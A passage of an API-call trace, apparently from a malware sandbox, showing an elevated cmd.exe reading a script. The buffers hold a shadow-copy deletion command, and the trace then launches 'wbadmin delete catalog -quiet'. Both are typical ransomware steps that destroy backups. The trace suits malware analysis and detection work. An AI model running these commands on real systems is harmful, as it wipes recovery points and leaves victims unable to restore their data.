lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.403] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.403] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e32e, cchWideChar=1 | out: lpWideCharStr=" delete shadows /all /quiet\n") returned 1 [0114.403] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.403] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.403] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.403] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e330, cchWideChar=1 | out: lpWideCharStr="ddelete shadows /all /quiet\n") returned 1 [0114.404] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.404] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.404] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.404] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e332, cchWideChar=1 | out: lpWideCharStr="eelete shadows /all /quiet\n") returned 1 [0114.404] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.404] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.404] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.404] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e334, cchWideChar=1 | out: lpWideCharStr="llete shadows /all /quiet\n") returned 1 [0114.404] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.404] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.404] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.404] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e336, cchWideChar=1 | out: lpWideCharStr="eete shadows /all /quiet\n") returned 1 [0114.404] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.404] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.404] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.404] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e338, cchWideChar=1 | out: lpWideCharStr="tte shadows /all /quiet\n") returned 1 [0114.404] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.404] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.405] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.405] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e33a, cchWideChar=1 | out: lpWideCharStr="ee shadows /all /quiet\n") returned 1 [0114.405] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.405] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.405] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.405] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e33c, cchWideChar=1 | out: lpWideCharStr=" shadows /all /quiet\n") returned 1 [0114.405] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.405] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.405] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.405] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e33e, cchWideChar=1 | out: lpWideCharStr="cshadows /all /quiet\n") returned 1 [0114.405] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.405] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.405] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.405] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e340, cchWideChar=1 | out: lpWideCharStr="ahadows /all /quiet\n") returned 1 [0114.405] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.405] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.405] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.405] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e342, cchWideChar=1 | out: lpWideCharStr="tadows /all /quiet\n") returned 1 [0114.405] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.405] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.406] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.406] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e344, cchWideChar=1 | out: lpWideCharStr="adows /all /quiet\n") returned 1 [0114.406] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.406] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.406] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.406] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e346, cchWideChar=1 | out: lpWideCharStr="lows /all /quiet\n") returned 1 [0114.406] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.406] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.406] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.406] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e348, cchWideChar=1 | out: lpWideCharStr="ows /all /quiet\n") returned 1 [0114.406] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.406] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.406] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.406] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e34a, cchWideChar=1 | out: lpWideCharStr="gs /all /quiet\n") returned 1 [0114.406] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.406] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.406] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.406] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e34c, cchWideChar=1 | out: lpWideCharStr=" /all /quiet\n") returned 1 [0114.406] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.407] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.407] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.407] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e34e, cchWideChar=1 | out: lpWideCharStr="-/all /quiet\n") returned 1 [0114.407] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.407] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.407] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.407] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e350, cchWideChar=1 | out: lpWideCharStr="qall /quiet\n") returned 1 [0114.407] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.407] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.407] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.407] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e352, cchWideChar=1 | out: lpWideCharStr="ull /quiet\n") returned 1 [0114.407] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.407] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.407] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.407] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e354, cchWideChar=1 | out: lpWideCharStr="il /quiet\n") returned 1 [0114.407] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.407] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.407] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.407] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e356, cchWideChar=1 | out: lpWideCharStr="e /quiet\n") returned 1 [0114.407] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.407] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.407] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.407] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e358, cchWideChar=1 | out: lpWideCharStr="t/quiet\n") returned 1 [0114.407] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.407] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.408] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.408] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e35a, cchWideChar=1 | out: lpWideCharStr="\nquiet\n") returned 1 [0114.408] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.408] GetFileType (hFile=0xa4) returned 0x3 [0114.408] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.408] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.408] _get_osfhandle (_FileHandle=1) returned 0x10c [0114.408] GetFileType (hFile=0x10c) returned 0x3 [0114.408] _get_osfhandle (_FileHandle=1) returned 0x10c [0114.408] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="wbadmin delete catalog -quiet\n", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wbadmin delete catalog -quiet\n", lpUsedDefaultChar=0x0) returned 31 [0114.408] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2cf538, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf538*=0x1e, lpOverlapped=0x0) returned 1 [0114.408] GetProcessHeap () returned 0x3e0000 [0114.408] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4012) returned 0x3ff630 [0114.408] GetProcessHeap () returned 0x3e0000 [0114.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ff630 | out: hHeap=0x3e0000) returned 1 [0114.409] GetProcessHeap () returned 0x3e0000 [0114.409] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0) returned 0x3f97e0 [0114.409] GetProcessHeap () returned 0x3e0000 [0114.409] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x20) returned 0x3f4610 [0114.409] GetProcessHeap () returned 0x3e0000 [0114.409] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x3e) returned 0x3faa40 [0114.409] GetConsoleOutputCP () returned 0x1b5 [0114.410] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f6bfe0 | out: lpCPInfo=0x49f6bfe0) returned 1 [0114.410] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.410] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4f0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0114.410] GetProcessHeap () returned 0x3e0000 [0114.410] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x218) returned 0x3e1ab0 [0114.410] GetProcessHeap () returned 0x3e0000 [0114.410] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4e) returned 0x3f9f20 [0114.410] GetProcessHeap () returned 0x3e0000 [0114.410] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x420) returned 0x3fba10 [0114.411] SetErrorMode (uMode=0x0) returned 0x1 [0114.411] SetErrorMode (uMode=0x1) returned 0x0 [0114.411] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3fba20, lpFilePart=0x2ced80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ced80*="Desktop") returned 0x25 [0114.411] SetErrorMode (uMode=0x1) returned 0x1 [0114.411] GetProcessHeap () returned 0x3e0000 [0114.411] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3fba10, Size=0x6c) returned 0x3fba10 [0114.411] GetProcessHeap () returned 0x3e0000 [0114.411] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fba10) returned 0x6c [0114.411] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.411] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.411] GetProcessHeap () returned 0x3e0000 [0114.411] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x128) returned 0x3e1cd0 [0114.411] GetProcessHeap () returned 0x3e0000 [0114.411] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x240) returned 0x3f9910 [0114.412] GetProcessHeap () returned 0x3e0000 [0114.412] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f9910, Size=0x12a) returned 0x3f9910 [0114.412] GetProcessHeap () returned 0x3e0000 [0114.412] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f9910) returned 0x12a [0114.412] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.412] GetProcessHeap () returned 0x3e0000 [0114.412] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe8) returned 0x3f5b70 [0114.412] GetProcessHeap () returned 0x3e0000 [0114.412] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f5b70, Size=0x7e) returned 0x3f5b70 [0114.412] GetProcessHeap () returned 0x3e0000 [0114.412] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5b70) returned 0x7e [0114.412] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.412] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0114.413] GetLastError () returned 0x2 [0114.413] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0114.413] GetLastError () returned 0x2 [0114.413] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0x3f5c00 [0114.413] FindClose (in: hFindFile=0x3f5c00 | out: hFindFile=0x3f5c00) returned 1 [0114.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0114.414] GetLastError () returned 0x2 [0114.414] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0x3f5c00 [0114.414] FindClose (in: hFindFile=0x3f5c00 | out: hFindFile=0x3f5c00) returned 1 [0114.414] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.414] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.414] GetConsoleTitleW (in: lpConsoleTitle=0x2cf040, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0114.414] GetProcessHeap () returned 0x3e0000 [0114.414] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x21c) returned 0x3f9a50 [0114.414] GetConsoleTitleW (in: lpConsoleTitle=0x3f9a60, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0114.414] GetProcessHeap () returned 0x3e0000 [0114.414] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f9a50, Size=0xb4) returned 0x3f9a50 [0114.414] GetProcessHeap () returned 0x3e0000 [0114.414] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f9a50) returned 0xb4 [0114.415] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - wbadmin delete catalog -quiet") returned 1 [0114.415] GetProcessHeap () returned 0x3e0000 [0114.415] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9a50 | out: hHeap=0x3e0000) returned 1 [0114.415] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cedf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cedb8 | out: lpAttributeList=0x2cedf8, lpSize=0x2cedb8) returned 1 [0114.415] UpdateProcThreadAttribute (in: lpAttributeList=0x2cedf8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ceda8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cedf8, lpPreviousValue=0x0) returned 1 [0114.415] GetStartupInfoW (in: lpStartupInfo=0x2cef10 | out: lpStartupInfo=0x2cef10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xa4, hStdOutput=0x10c, hStdError=0x10c)) [0114.415] GetProcessHeap () returned 0x3e0000 [0114.416] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x20) returned 0x3f4640 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.416] _wcsnicmp 